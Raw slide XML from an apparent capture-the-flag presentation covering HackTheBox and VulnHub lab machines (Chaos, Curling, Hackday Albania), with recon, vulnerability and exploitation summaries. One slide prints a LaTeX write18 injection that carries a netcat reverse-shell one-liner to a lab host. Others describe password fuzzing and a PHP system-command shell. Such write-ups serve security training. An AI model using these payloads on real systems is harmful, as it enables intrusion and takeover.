          <p:cNvPr id="220" name="Google Shape;220;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308175" y="3619575"/>
            <a:ext cx="2200200" cy="6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 using \def to deﬁne new commands.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21" name="Google Shape;221;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2542000" y="303925"/>
            <a:ext cx="2699400" cy="12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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>\immediate\write18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1| nc 10.10.12.171 1234 &gt;/tmp/f}</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22" name="Google Shape;222;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5464450" y="4065925"/>
            <a:ext cx="1712100" cy="7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One user on the system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ayush</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6627950" y="823625"/>
            <a:ext cx="2418300" cy="6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su ayush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>su -ayush</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1218025"/>
            <a:ext cx="1870500" cy="7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Follow HTTP Stream</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209650" y="187025"/>
            <a:ext cx="1264500" cy="4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moz://a</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="230" name="Google Shape;230;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="922225"/>
            <a:ext cx="8839201" cy="1399618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2474243"/>
            <a:ext cx="3915110" cy="2516856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="232" name="Google Shape;232;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842370" y="2474250"/>
            <a:ext cx="3845255" cy="2471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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="163025" y="790025"/>
            <a:ext cx="8631976" cy="4143925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246550" y="240175"/>
            <a:ext cx="2515500" cy="5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51C75"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Curling</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="351C75"/>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208313" y="0"/>
            <a:ext cx="7992713"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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" dirty="0"/>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>Ports 22 and 80 open</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>On Port 80, http service was running, On Port 22 ssh was running</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>The operating system the system was running on was Ubuntu Linux version 4</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>The Web content manager used to develop the webpage was Joomla.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232225" y="257175"/>
            <a:ext cx="7503300" cy="43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1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Joomscan was used to scan for vulnerabilities; no firewalls were detected</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The webservice ran on http instead of https</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The url was susceptible to command injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Secret.txt file found in the source code which contained an encrypted password</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File viewing was possible between normal user and root user</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265600" y="95125"/>
            <a:ext cx="8411100" cy="42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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1">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Wordlists were generated from the website using CeWL</a:t>
            </a:r>
            <a:endParaRPr sz="240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Burpsuite was used to intercept login requests</a:t>
            </a:r>
            <a:endParaRPr sz="240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Wfuzz was used to match the words generated with the password we decoded from secret.txt</a:t>
            </a:r>
            <a:endParaRPr sz="240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A new php file was created after login and we used system command in it, this helped us get reverse shell</a:t>
            </a:r>
            <a:endParaRPr sz="240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Was able to run whoami command in the url</a:t>
            </a:r>
            <a:endParaRPr sz="240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Was able to gain www-data user access into the user’s shell, then root access.</a:t>
            </a:r>
            <a:endParaRPr sz="240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Was able to do a remote login to the target’s machine using ssh</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Milestones</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="186975" y="908000"/>
            <a:ext cx="3409150" cy="1732900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4016500" y="838850"/>
            <a:ext cx="4012333" cy="1732900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="261" name="Google Shape;261;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="186975" y="2810575"/>
            <a:ext cx="3923175" cy="1995800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Google Shape;262;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348200" y="3462300"/>
            <a:ext cx="4434650" cy="866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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="94" name="Google Shape;94;p14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="217500" y="731425"/>
          <a:ext cx="8535250" cy="3523000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{158EDE2D-5140-4CE5-8088-8FD6ECF2DEED}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1707050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1707050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1707050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1707050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1707050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="880750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>Platform</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Machine Name</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>System Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>Difficulty </a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>Network </a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>Tester</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="880750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>VulnHub</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Hackday Albania</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Ubuntu 16.04.1</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Intermediate</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>192.168.56.104</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Esaias</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="880750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>HackTheBox</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Chaos</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Ubuntu 4.13.0</a:t>
                      </a:r>
                      <a:endParaRPr/>
